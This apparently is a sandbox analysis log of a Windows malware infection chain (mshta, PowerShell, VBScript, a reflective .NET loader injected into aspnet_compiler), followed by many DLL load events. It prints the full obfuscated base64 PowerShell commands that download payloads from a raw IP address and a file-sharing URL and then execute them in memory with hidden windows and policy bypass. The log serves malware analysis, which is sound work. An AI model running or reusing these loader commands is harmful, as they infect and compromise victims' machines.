invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
